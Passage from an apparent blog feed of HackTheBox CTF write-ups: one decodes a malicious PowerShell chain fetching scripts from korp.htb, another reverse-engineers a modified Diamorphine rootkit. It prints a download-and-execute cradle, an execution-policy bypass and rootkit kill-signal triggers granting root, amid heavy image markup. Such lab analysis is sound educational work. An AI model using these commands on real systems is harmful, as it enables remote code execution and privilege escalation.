https://substackcdn.com/image/fetch/$s_!MPFl!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 1272w, https://substackcdn.com/image/fetch/$s_!MPFl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34d75455-b065-4ea2-950a-5faffdc96aa0_882x606.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Decoded Command:</strong></p><p>IEX (New-Object Net.WebClient).DownloadString("http://korp.htb/update")</p><p>This command downloads and executes another PowerShell script from korp.htb/update.</p><p><strong>&#127760; Step 4: Triggering the Malicious Request</strong></p><p>Since the script fetches <a href="http://korp.htb/update">http://korp.htb/update</a>, we can manually visit this URL in a browser. <strong>Ensure you use the correct port!</strong></p><p><a href="http://korp.htb:[PORT]/update">http://korp.htb:[PORT]/update</a></p><p><strong>What Happens?</strong></p><p>This downloads <strong>update.ps1</strong>.</p><p><strong>&#128196; Step 5: Analyzing update.ps1</strong></p><p>Upon inspecting <strong>update.ps1</strong>, we find another PowerShell command that downloads yet another script (a541a.ps1).</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AgAF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AgAF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 424w, https://substackcdn.com/image/fetch/$s_!AgAF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 848w, https://substackcdn.com/image/fetch/$s_!AgAF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 1272w, https://substackcdn.com/image/fetch/$s_!AgAF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AgAF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png" width="1202" height="166" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:166,&quot;width&quot;:1202,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!AgAF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 424w, https://substackcdn.com/image/fetch/$s_!AgAF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 848w, https://substackcdn.com/image/fetch/$s_!AgAF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 1272w, https://substackcdn.com/image/fetch/$s_!AgAF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F14a4e187-5caf-44bb-9fe2-de5a0cd8127f_1202x166.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Running the Script:</strong></p><p>Powershell window pops up, we can see the flag for a brief second, we will need to modify to keep that window open so we can get the flag.</p><p><strong>Modified PowerShell Script:</strong></p><p>Invoke-WebRequest -Uri "<a href="http://korp.htb:[PORT]/a541a.ps1">http://korp.htb:[PORT]/a541a.ps1</a>" -Headers @{"X-HTB-KEY"="5337a3229062ff18afede1dc913d254d"} -Method GET -OutFile a541a.ps1<br>powershell.exe -NoExit -ExecutionPolicy Bypass -File "a541a.ps1"</p><p><strong>Running this Script:</strong></p><ol><li><p><strong>Modify the [PORT] value to match your Docker instance.</strong></p></li></ol><ol><li><p>Save the script as fetch_flag.ps1.</p></li><li><p>Run it in <strong>PowerShell</strong>.</p></li></ol><p>powershell -ExecutionPolicy Bypass -File fetch_flag.ps1</p><p><strong>&#127919; Step 6: Retrieving the Flag!</strong></p><p>Running the final script downloads a541a.ps1, executes it, and <strong>reveals the flag</strong> in a PowerShell window.</p><p>To prevent the window from closing instantly, we added -NoExit to keep it open.</p><p><strong>&#128161; Enjoy your victory! </strong>&#127942;</p><p><strong>&#127881; Final Thoughts</strong></p><p>This challenge provided hands-on experience with:</p><ul><li><p><strong>Analyzing encoded PowerShell payloads </strong>&#129488;</p></li><li><p><strong>Decoding Base64 commands </strong>&#128270;</p></li><li><p><strong>Bypassing execution policies </strong>&#128293;</p></li><li><p><strong>Modifying PowerShell scripts to include necessary headers </strong>&#127919;</p></li><li><p><strong>Investigating malicious web requests </strong>&#127760;</p></li></ul><p>Great job on reclaiming <strong>Thorin&#8217;s Amulet</strong>! &#127941;</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Cyberpsychosis]]></title><description><![CDATA[Challenge]]></description><link>https://www.byteberzerker.com/p/hackthebox-cyberpsychosis</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hackthebox-cyberpsychosis</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Fri, 21 Feb 2025 22:30:52 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!djiO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Rootkit Analysis &amp; Exploitation Write-up</strong></p><p><strong>Introduction</strong></p><p>Malicious actors have infiltrated our systems and implanted a custom rootkit. Our goal is to disarm the rootkit, remove it, and retrieve the hidden data. Below is a step-by-step analysis and exploitation process.</p><p><strong>Step 1: Unzip and Analyze the File</strong></p><ol><li><p>Extract the challenge folder: <br>unzip challenge.zip -d challenge</p></li><li><p>Load the file into <strong>Detect It Easy (DIE)</strong> to analyze its type.</p></li><li><p>Identify the file as an <strong>ELF binary</strong>, which is typical for Linux kernel modules.</p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4HLh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4HLh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 424w, https://substackcdn.com/image/fetch/$s_!4HLh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 848w, https://substackcdn.com/image/fetch/$s_!4HLh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 1272w, https://substackcdn.com/image/fetch/$s_!4HLh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4HLh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png" width="368" height="110" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d3633169-aad2-4247-91d3-8aecbf397086_368x110.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:110,&quot;width&quot;:368,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4HLh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 424w, https://substackcdn.com/image/fetch/$s_!4HLh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 848w, https://substackcdn.com/image/fetch/$s_!4HLh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 1272w, https://substackcdn.com/image/fetch/$s_!4HLh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3633169-aad2-4247-91d3-8aecbf397086_368x110.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p><strong>Step 2: Reverse Engineer the Binary</strong></p><ol><li><p>Load the file into <strong>Binary Ninja</strong> for further analysis.</p></li><li><p>Identify the file as <strong>Diamorphine</strong>, a well-known Linux rootkit.</p></li><li><p>Conduct a quick Google search, leading to its GitHub repository: <a href="https://github.com/m0nad/Diamorphine">https://github.com/m0nad/Diamorphine</a></p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!djiO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!djiO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 424w, https://substackcdn.com/image/fetch/$s_!djiO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 848w, https://substackcdn.com/image/fetch/$s_!djiO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 1272w, https://substackcdn.com/image/fetch/$s_!djiO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!djiO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png" width="1193" height="392" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:392,&quot;width&quot;:1193,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!djiO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 424w, https://substackcdn.com/image/fetch/$s_!djiO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 848w, https://substackcdn.com/image/fetch/$s_!djiO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 1272w, https://substackcdn.com/image/fetch/$s_!djiO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7533d2-d2d1-4e95-9440-e34c42eec815_1193x392.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 3: Understanding Rootkit Behavior</strong></p><p><strong>Observations from the README (Uninstall Instructions)</strong></p><ul><li><p>The module <strong>starts hidden</strong>.</p></li><li><p>To make it visible, we need to use: <br>kill -63 0</p></li><li><p>Once visible, we can remove it with: <br>rmmod diamorphine</p></li></ul><p><strong>Step 4: Attempting to Remove the Rootkit</strong></p><ol><li><p><strong>Connect to the system using Netcat: <br>nc -nv &lt;target-ip&gt; &lt;port&gt;</strong></p></li><li><p><strong>Attempt kill -63 0 to make the module visible.</strong></p></li><li><p><strong>System crashes (Kernel Panic) - indicating a potential modification of the original Diamorphine code.</strong></p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Tr7F!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Tr7F!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 424w, https://substackcdn.com/image/fetch/$s_!Tr7F!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 848w, https://substackcdn.com/image/fetch/$s_!Tr7F!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 1272w, https://substackcdn.com/image/fetch/$s_!Tr7F!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Tr7F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png" width="1456" height="563" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:563,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Tr7F!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 424w, https://substackcdn.com/image/fetch/$s_!Tr7F!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 848w, https://substackcdn.com/image/fetch/$s_!Tr7F!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 1272w, https://substackcdn.com/image/fetch/$s_!Tr7F!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F575735cf-71e8-46d4-8fd1-aadbf31c26da_1704x659.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 5: Finding the Modified Kill Switch</strong></p><ol><li><p><strong>Return to Binary Ninja and search for cmp instructions in hacked_kill().</strong></p></li></ol><ol><li><p>Notice multiple cmp instructions:</p><ul><li><p>cmp eax, 0x3F (Original kill -63 for visibility toggle)</p></li><li><p>cmp eax, 0x40 (Modified code, corresponds to kill -64 for root access)</p></li><li><p>cmp eax, 0x2E (New visibility toggle, corresponds to kill -46)</p></li></ul></li></ol><ol><li><p><strong>Testing kill -64 0 gives root access, confirming the attacker modified the rootkit to require a different code.</strong></p></li></ol><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BRhh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BRhh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 424w, https://substackcdn.com/image/fetch/$s_!BRhh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 848w, https://substackcdn.com/image/fetch/$s_!BRhh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 1272w, https://substackcdn.com/image/fetch/$s_!BRhh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BRhh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png" width="635" height="428" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:428,&quot;width&quot;:635,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:34853,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.byteberzerker.com/i/157641207?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BRhh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 424w, https://substackcdn.com/image/fetch/$s_!BRhh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 848w, https://substackcdn.com/image/fetch/$s_!BRhh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 1272w, https://substackcdn.com/image/fetch/$s_!BRhh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1f44340a-2ec1-49e3-a6f5-39f1ecb77dc6_635x428.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 